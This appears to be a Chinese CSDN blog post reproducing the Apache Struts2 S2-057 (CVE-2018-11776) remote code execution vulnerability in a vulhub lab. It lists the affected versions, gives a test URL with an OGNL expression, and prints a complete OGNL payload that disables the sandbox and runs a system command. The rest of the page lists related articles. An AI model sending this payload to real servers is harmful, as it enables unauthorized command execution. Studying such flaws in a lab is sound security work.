S2-057 任意代码执行漏洞(CVE-2018-11776)

最新推荐文章于 2023-11-08 14:47:18 发布
最新推荐文章于 2023-11-08 14:47:18 发布
阅读量244 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119672328
版权

漏洞简介

影响版本: <= Struts 2.3.34, Struts 2.5.16
详细请看:https://vulhub.org/#/environments/struts2/s2-057/

漏洞复现

这次OGNL的解析在url上,我们可以先检验漏洞是否存在:

http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

在这里插入图片描述
可以看到访问后已经被执行了,当然在burp上更加能够体现!
先放个POC:

${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

在这里插入图片描述
注意url编码!

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
任意代码执行
Le0nis的博客
07-26 3680
任意代码执行
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
文件包含struts-2.5.16-源码+示例,利用附件文件可以很方便的搭建出调试S2-057漏洞环境,欢迎各位取用
任意代码执行(简称ACE)是指攻击者能够讓目标電腦或目标进程中执行任意命令或代码
最新发布
weixin_40191861的博客
11-08 122
(简称ACE)是指攻击者能够讓目标電腦或目标中执行任意命令或代码。如果系統有地方可以被以執行任意代碼,則此處被稱為。特別設計利用此一漏洞的程式,稱為。可以通过网络(尤其是通过互联网等广域网)讓目标電腦(遠程電腦)執行任意代码的能力稱為(RCE)。
网站apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
网站安全专家
08-23 1346
S2-057漏洞,于2018年8月22日被曝出,该Struts2 057漏洞存在远程执行系统的命令,尤其使用linux系统,apache环境,影响范围较大,危害性较高,如果被攻击者利用直接提权到服务器管理员权限,网站数据被篡改,数据库被盗取都会发生。 目前我们SINE安全对该S2-057漏洞的测试,发现受影响的版本是Apache Struts 2.3–ApacheStruts2.3.34、Apa...
Struts2 S2-057远程代码执行漏洞
weixin_46801402的博客
11-01 847
Struts2 S2-057远程代码执行漏洞
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
首先,s2-005漏洞CVE-2012-0881)是2012年发现的一个严重问题,它涉及到Struts2的OGNL(Object-Graph Navigation Language)表达式在反序列化过程中的不当处理。OGNL是一种强大的表达式语言,允许动态访问和操作...
S2-057-poc
08-23
S2-057漏洞,也称为CVE-2018-11776,是Struts2框架中的一个严重安全漏洞,允许远程代码执行(RCE),可能导致攻击者能够完全控制受影响的系统。这个漏洞主要出现在Struts2的Struts REST插件中,当用户通过HTTP头发送...
Struts2 s2-032远程代码执行分析1
08-08
Struts2 s2-032 远程代码执行漏洞是一个严重的安全问题,涉及到的是Apache Struts2框架的一个核心功能,即动态方法调用。这个漏洞发生在2016年4月15日,被安恒安全研究院发现,并被CVE(Common Vulnerabilities and ...
Struts2-057漏洞检测python脚本
11-04
总结起来,Struts2-057漏洞是一个严重的问题,可能使服务器面临远程代码执行的风险。通过使用Python脚本进行检测,我们可以识别出存在漏洞的系统并采取措施进行修复,以保障网络安全。在日常开发和维护过程中,了解...
struts2-057扫描工具
08-27
这个漏洞属于远程代码执行(Remote Code Execution, RCE)类型,允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,从而可能导致数据泄露、系统瘫痪甚至完全控制服务器。 **Struts2-057漏洞详解** Struts2-...
任意代码执行(简称ACE)是指攻击者能够讓目标電腦或目标进程中执行任意命令或代码
weixin_40191861的博客
08-21 239
(简称ACE)是指攻击者能够讓目标電腦或目标中执行任意命令或代码。如果系統有地方可以被以執行任意代碼,則此處被稱為。特別設計利用此一漏洞的程式,稱為。可以通过网络(尤其是通过互联网等广域网)讓目标電腦(遠程電腦)執行任意代码的能力稱為(RCE)。
任意代码执行漏洞
weixin_34144450的博客
07-25 468
0x00 什么是任意代码执行当应用在调用一些能将字符串转化成代码的函数(如PHP重的eval)时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中,如PHP的eval函数,可以将字符串代表的代码作为PHP代码执行,当用户能够控制这段字符串时,将产生代码注入漏洞(也称命令执行)。广义上的代码注入,可以覆盖大半安全漏洞的分类。...
漏洞复现】vulhub struts2/s2-057
qq_46421742的博客
07-03 196
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
任意代码命令执行漏洞
cldimd的博客
03-21 1286
代码执行: 原理: 当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞。 在php中: eval assert preg_replace(‘/*/e', '$ret = "\\1";',$data); 在asp中: e...
基于.NET动态编译技术实现任意代码执行
biyusr的专栏
07-15 323
当下主流的Waf或WindowsDefender等终端杀软、EDR大多都是从特征码查杀,在.Net和VBS下一句话木马中最常见的特征是eval,对于攻击者来说需要避开这个系统关键字,可从反序列化方式避开eval,但公开已久相信很多安全产品已经能够很好检测和阻断这类攻击请求。,而在.NET中eval只存在于Jscript.Net,所以需要将动态编译器指定为Jscript,其余和C#版本的动态编译基本一致,笔者通过插入无关字符将eval拆解掉,代码如下。...
Vim任意代码执行漏洞CVE-2019-12735)
Sylon的博客
06-10 2374
Vim通过Modelines执行任意代码 漏洞概要: 在8.1.1365之前的Vim和在0.3.6之前的Neovim很容易通过打开特制的文本文件而通过模型执行任意代码。 复现条件: 确保未禁用modeline选项(:set modeline)。 开启 modeline # vim /usr/share/vim/vimrc 大概在50行写入 :set modeline 复现过程: 1....
9_任意代码执行(字符串转换成代码执行)
weixin_33904756的博客
08-31 2723
一、背景介绍   当应用在调用一些能将字符串转化为代码的函数(如php中的eval)时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中,如php的eval函数,可以将字符串代表的代码作为php代码执行,当用户能够控制这段字符串时,将产生代码注入代码注入漏洞(也称命令执行)。广义上的代码注入,可以覆盖大半安全漏洞的分类。 二、漏洞成因  ...
Apache struts2 namespace远程命令执行CVE-2018-11776(S2-057)漏洞复现
m0_49506405的博客
03-01 4680
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到xml上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码以及系统命令到服务器系统中去。 启动环境后,在Win10上访问http://IP:port/struts2-showcase 1.构建Payload: 访问: http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action.
Apache Unomi 1.5.2以下版本面临CVE-2020-13942远程代码执行漏洞
"CVE-2020-13942 是一个针对Apache Unomi的严重安全漏洞,涉及远程代码执行(Remote Code Execution, RCE)风险。Apache Unomi 是一款开源的事件管理和分析平台,用于收集、处理和分析应用程序的日志和事件数据。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值